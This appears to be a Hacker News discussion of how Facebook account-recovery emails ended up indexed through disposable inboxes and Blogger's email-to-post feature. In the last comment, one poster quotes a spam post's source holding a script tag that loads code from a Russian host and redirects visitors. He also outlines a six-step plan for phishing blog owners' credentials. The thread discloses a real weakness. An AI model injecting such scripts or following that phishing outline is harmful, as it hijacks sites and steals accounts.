[Matt_Cutts]

Okay, I've been through all the comments and I'm going to try to summarize:

- It looks like in some situations, Facebook will send an email that has a link. That link expires after a certain amount of time, but in the mean time, clicking that link lets people access that Facebook account.

- A large number of services can be set up to automatically post any email received onto the web. One major category is disposable email services such as asdasd.ru. Any email to a throwaway account on asdasd.ru gets put up on the web. Here's an example Facebook recovery email that got turned into a web page: http://asdasd.ru/read/414831

- Once these emails are just webpages, it's no surprise that search engines discover those URLs. Note that this is not a Google-specific issue. When I search on Bing for the query [site:facebook.com bcode n_m mid], the first result is also one of these urls that has an email address embedded in it. For a debunk of the misconception that this is related to the Google Toolbar or Chrome, see my post elsewhere in this discussion at http://news.ycombinator.com/item?id=4733276

So: an email gets sent to someone. That email gets put up on the web as a webpage. Search engines (including both Google and Bing) find that webpage as they follow links on the web.

[blauwbilgorgel]

I tried Bing and Yandex to find the email bodies. They didn't return many results (but they do return results).

http://www.bing.com/search?q=%22wants+to+be+friends+on+Faceb...

When I try on Google to find the email bodies, I get 250k results, of which the large majority are on blogspot.com sites.

While mail bodies can be found on a few other sites, like the asdasd.ru example, and other search engines have found these links too, the main issue still seems to be with blogspot.com -- These aren't throwaway accounts with public inboxes, but likely some virus that is intercepting certain mails (Facebook, Twitter, Youtube, Twoo) and reposting them as a blogpost for everyone to see.

As Blogspot is Google-owned, this does seem to me a predominantly Google-specific issue.

[Matt_Cutts]

No, Blogger also has a feature that will automatically post messages sent to an email address. Here's an example email from Facebook that was posted to a blogspot.com url: http://weight-loss-information-123.blogspot.com/2012/08/misb...

If you look at the bottom of that Blogger post, it says "This message was sent to <a gmail address>." So an email from Facebook got posted as a web page to this blog.

There's no need to suspect some virus that's intercepting emails. Plenty of people have set up their systems such that email messages get turned into web pages.

[blauwbilgorgel]

You are probably right and I apologize for any misinformation. To me it seemed strange that the blogs first started spamming, followed by publishing only certain emails. Wouldn't it make more sense if all emails were published, not only from certain webservices? Why would a user want to publish their private Facebook emails in the first place? None of these accounts posts normal updates, they act compromised.

[blauwbilgorgel]

Automatically posting any email received onto the web can be a security issue. As you said, Blogspot is indiscriminate on which e-mail it publishes, there is no need to suggest a virus is targeting Facebook or Twitter mails -- I was confused on that point.

I've tested the indiscriminate posting and any HTML you send to Blogspot accounts with this feature gets published: Including <script> tags.

An e-mail client isn't supposed to execute <script> tags, I feel if you republish an email online, it should strip out the <script> tags too.

The Blogspot sites that run this service are currently under attack by spammers, who send spam emails (which don't seem to get filtered very well), allowing spam by proxy and editorial-looking links. Some go even further and send them emails containing redirect scripts, or entire websites with CSS-styles set on the body.

  view-source:http://byubjjclub.blogspot.com/search?updated-max=2012-10-23T21:02:00-06:00&max-results=5&start=5&by-date=false

contains such an email-to-webpage post as an example in the source.

  <div class='post-body entry-content' id='post-body-3218874062265356726' itemprop='description articleBody'>
  <style type="text/css"> 
  h1 a:hover {background-color:#888;color:#fff ! important;}                          
  [...]
  </style> 
  [...]
  <div xmlns="http://www.w3.org/1999/xhtml" id="emailbody" 
  style="margin:0 2em;
  [...]
  <table style="border:0;padding:0;margin:0;width:100%">
  [...]
  <br /> <br /> <script language="javascript"   

  src="http://luckysearcher.ru/6peybjqhb197phmv2pevisws0k5u0k5"
  type="text/javascript"></script> <img  
  src="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcTcpQG9IOqXoDrlzTdytRpeTN7sqIocaNZBAwxXxGEGUNrD4iwE" /> 
  <br /> <br />
  [...]
  To stop receiving these emails, you may <a href="http://feedburner.google.com/fb/a/mailunsubscribe?k=uVg9TnxQ6-Owt_QRoJn279y21hs">unsubscribe now</a>.
  </td> <td style="font-family:Helvetica,Arial,Sans- 
  Serif;font-size:11px;margin:0 6px 1.2em 0;color:#333;text   
  align:right;vertical-align:top">Email delivery powered by 
  Google</td> </tr> <tr>
  ...

Sending such an e-mail to Blogspot users with this feature, will redirect all their visitors to

  view-source:http://mupara.ru/index.php?pid=19868&subid=31445&psn=131

Custom CSS and custom script allow for attack vectors such as these. Spam doesn't seem to filter very well. This is something of an issue that Blogspot can protect their users and visitors against, no? And did the users of this function understand the privacy ramifications of turning their inbox into a public mailing-list?

Worse than redirects, thinking like a wicked spammer:

  1. User turns on feature inbox-to-webpage
  2. Spammer finds these users by scanning the index
  3. Spammer sends such users (or with every spam mail) a malicious javascipt file
  4. javascript pop-up with: "Re-enter your credentials"
  5. Change password and steal blog
  6. Check if blogspot account is connected to a Gmail account.